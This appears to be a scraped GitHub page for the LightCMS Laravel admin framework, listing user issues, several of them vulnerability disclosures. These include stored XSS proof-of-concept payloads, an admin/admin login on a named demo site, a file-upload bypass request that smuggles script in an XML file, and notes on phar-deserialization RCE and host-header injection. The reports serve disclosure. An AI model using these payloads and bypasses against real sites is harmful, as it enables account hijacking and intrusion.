eddy8 / lightcms Goto Github PK

View Code? Open in Web Editor NEW

350.0 350.0 85.0 9.2 MB

LightCMS 是一个基于 Laravel 开发的轻量级 CMS 系统，也可以作为一个通用的后台管理框架使用。A lightweight cms/admin framework powered by Laravel.

License: Apache License 2.0

PHP 64.76% Blade 35.24%

admin cms laravel lightcms php

lightcms's People

Contributors

Stargazers

Watchers

lightcms's Issues

发现疑似错误

视图文件
/resources/views/admin/content/add.blade.php line287
@if(isset($model) && $field->is_required == \App\Model\Admin\EntityField::EDIT_DISABLE)
is_required应改为is_edit 此处判断是否可编辑，并非是否必填，请核对

RCE vulnerability in lightcms v1.3.7

Description

The image:make function in fetchImageFile can trigger phar deserialization. Combined with the deserialization chain of the laravel framework, it can cause remote code execution vulnerabilities.

Impact Version

lightcms latest version (v1.3.7)

Steps to Reproduce

Please see this link for details.

Stored XSS in "exclusive" field - SensitiveWords

Description -

There's no escape being done before printing out the value of noun、verb、exclusive in the SensitiveWords page.

LightCMS version - v1.3.4

Steps to reproduce -

Navigate to http://lightcms.bituier.com/admin/login & Log in to the background with the account admin and password admin
Navigate to http://lightcms.bituier.com/admin/SensitiveWords/create & add the below-shared payload as the exclusive field value.
Payload - </span><img src=1 onerror=alert(1) /><span>
Visit page http://lightcms.bituier.com/admin/SensitiveWords, the payload will be triggered.

请问如果要集成OSS 需要调整那些东西呢

企业图片加载速度比较忙，希望把图片上传集成到oss

NEditorController 里面是有存储图片的入口，
是否只需要uploadImage

$result = $file->store(date('Ym'), config('light.neditor.disk')); if (!$result) { return [ 'code' => 3, 'msg' => '上传失败' ]; }

改写入口，还是可以通过扩展包来增加新的呢

提示内容：服务器内部错误，请联系管理员
log：
production.ERROR: No application encryption key has been specified. {"exception":"[object] (RuntimeException(code: 0): No application encryption key has been specified. at D:\Project\cms\vendor\laravel\framework\src\Illuminate\Encryption\EncryptionServiceProvider.php:42)
[stacktrace]

解决方案：
重新生成.env并执行
php artisan key:generate

Cross-Site Request Forgery (CSRF) in eddy8/lightcms

https://huntr.dev/bounties/abf4abd8-0c98-4707-91c2-99cd9f493b17/

A stored cross-site scripting (XSS) vulnerability exists in LightCMS "contents" field

A stored cross-site scripting (XSS) vulnerability exists in LightCMS that allows an user authorized to upload a malicious .pdf file which acts as a stored XSS payload. If this stored XSS payload is triggered by an administrator it will trigger a XSS attack.

login as admin in the article page
create a new article
upload the malicious pdf. the content of xss.pdf :

%PDF-1.4
%1111
1 0 obj
<<
/CreationDate (D:20210619104632+08'00')
/Creator (xss)
/Producer (PDF-XChange Core API SDK \(7.0.324.2\))
>>
endobj
2 0 obj
<<
/Metadata 3 0 R
/Pages 4 0 R
/Type /Catalog
>>
endobj
3 0 obj
<<
/Length 2983
/Subtype /XML
/Type /Metadata
>>
stream
<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="XMP Core 5.5.0">
	<rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
		<rdf:Description rdf:about=""
				xmlns:dc="http://purl.org/dc/elements/1.1/"
				xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/"
				xmlns:xmp="http://ns.adobe.com/xap/1.0/"
				xmlns:pdf="http://ns.adobe.com/pdf/1.3/">
			<dc:format>application/pdf</dc:format>
			<xmpMM:DocumentID>uuid:9c93bc08-8e4e-46cb-b28f-824c693821a4</xmpMM:DocumentID>
			<xmpMM:InstanceID>uuid:2cd63bea-24ca-4ef8-a12c-015da3b28c96</xmpMM:InstanceID>
			<xmp:CreateDate>2021-06-19T10:46:32+08:00</xmp:CreateDate>
			<xmp:CreatorTool>迅捷PDF编辑器 7.0.324.2</xmp:CreatorTool>
			<xmp:ModifyDate>2021-06-19T10:52:02+08:00</xmp:ModifyDate>
			<pdf:Producer>PDF-XChange Core API SDK (7.0.324.2)</pdf:Producer>
		</rdf:Description>
	</rdf:RDF>
</x:xmpmeta>

back to content then wo edit this upload:
when user click the link it will trigger a XSS attack

请问怎么生成左侧菜单

搞了一天没弄明白，怎么自己生成左侧菜单

Host header attack vulnerability exists in Lightcms 2.0 . An attacker can use man in the middle attack to attack users such as phishing

The system does not verify the host value. If the host value is modified, the link returned by the website will splice the malicious host value。like this：

And the header Referer does not verify the value too. we can jump any website and xss

A stored cross-site scripting (XSS) vulnerability exists in LightCMS "Content Management - Articles" field

The lightcms content management system uses an outdated ueditor component, therefore there is a domxss vulnerability that allows users to upload an XML file containing a malicious payload which could trigger the vulnerability and lead to an XSS attack.

00x1

Log into the admin backend, click on Content Management - Articles - Upload Image

00x2

Then upload an image and modify the upload interface, file extension and file header.

00x1

Modify the file upload interface to be 'uploadfile'

POST /admin/neditor/serve/uploadfile

-----WebKitFormBoundary4aYhw3HzIslHq0Kq
Content-Disposition: form-data; name="file"; filename="test.jpg"
Content-Type: image/xml

<?xml version="1.0" encoding="GB2312" ?>
<html>
<head>
</head><body>
<something:script xmlns:something="http://www.w3.org/1999/xhtml">alert(1);</something:script>
</body>
</html>


------WebKitFormBoundary4aYhw3HzIslHq0Kq--